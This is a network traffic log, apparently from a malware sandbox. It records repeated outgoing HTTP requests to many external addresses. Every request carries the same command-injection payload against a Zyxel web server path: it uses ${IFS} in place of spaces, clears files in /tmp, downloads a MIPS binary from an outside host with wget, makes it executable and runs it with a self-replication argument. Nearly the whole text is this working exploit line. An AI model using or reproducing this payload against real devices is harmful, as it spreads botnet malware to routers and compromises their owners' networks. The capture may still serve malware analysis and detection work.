                                            Feb 2, 2024 06:21:13.643676043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4634192.168.2.1559822184.3.160.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.643722057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4635192.168.2.1540890159.81.38.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.646939993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4636192.168.2.1541368207.34.130.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.646969080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4637192.168.2.153452680.238.189.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.654269934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4638192.168.2.1552326100.61.30.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.654333115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4639192.168.2.1551574110.182.113.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.654347897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4640192.168.2.1536296181.56.63.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.654401064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4641192.168.2.154305489.231.169.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.654428005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4642192.168.2.154665489.68.119.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.654459953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4643192.168.2.155008848.100.129.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.654498100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4644192.168.2.1556162111.165.199.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.654539108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4645192.168.2.155226074.243.242.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.654556990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4646192.168.2.156060462.159.15.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.654614925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4647192.168.2.1544444193.252.36.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.654654026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4648192.168.2.1534374155.157.243.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.654704094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4649192.168.2.1542980219.68.86.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.654730082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4650192.168.2.1558026104.109.174.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.654769897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4651192.168.2.1534190141.83.40.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.654805899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4652192.168.2.154587251.193.187.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.654850960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4653192.168.2.15370809.112.242.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.654889107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4654192.168.2.1542530189.90.155.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.654921055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4655192.168.2.155009648.110.201.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.654957056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4656192.168.2.154868657.45.183.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.654998064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4657192.168.2.1549834156.179.121.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655042887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4658192.168.2.153665042.104.120.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655066967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4659192.168.2.1546578123.54.64.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655097961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4660192.168.2.154770264.78.8.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655129910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4661192.168.2.1538162221.35.242.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655160904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4662192.168.2.155366480.79.176.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655194998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4663192.168.2.1557534110.240.2.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655242920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4664192.168.2.1540788116.130.242.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655293941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4665192.168.2.1557416120.139.248.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655335903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4666192.168.2.154586461.164.144.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655354977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4667192.168.2.154494634.0.29.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655380011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4668192.168.2.154856614.78.47.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655428886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4669192.168.2.154092878.82.182.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655448914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4670192.168.2.1546730193.47.19.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655491114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4671192.168.2.155336487.196.137.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655518055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4672192.168.2.154940073.114.202.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655566931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4673192.168.2.1536806179.216.163.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655591965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4674192.168.2.1539774164.111.36.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655631065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4675192.168.2.155501040.51.219.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655678988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4676192.168.2.1553456160.158.172.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655713081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4677192.168.2.1534860108.45.158.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655733109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4678192.168.2.1533394209.206.193.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655805111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4679192.168.2.15510581.125.209.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655823946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4680192.168.2.153545862.247.171.218443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655870914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4681192.168.2.1536964141.161.52.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655916929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4682192.168.2.154704267.194.59.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655958891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4683192.168.2.155158072.71.112.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.655994892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4684192.168.2.155146034.22.97.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656032085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4685192.168.2.1556580107.171.79.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656069040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4686192.168.2.155274057.111.117.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656107903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4687192.168.2.1534966157.155.98.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656135082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4688192.168.2.1543362118.55.42.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656166077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4689192.168.2.1557850124.126.97.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656213045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4690192.168.2.1545212166.10.99.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656233072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4691192.168.2.1557094136.21.102.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656279087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4692192.168.2.154683237.58.195.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656311035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4693192.168.2.155017464.151.105.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656338930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4694192.168.2.155703864.212.35.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656373978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4695192.168.2.154340817.113.65.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656430006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4696192.168.2.1537946188.4.199.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656446934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4697192.168.2.1544966133.85.189.194443
                                            TimestampBytes transferredDirectionData
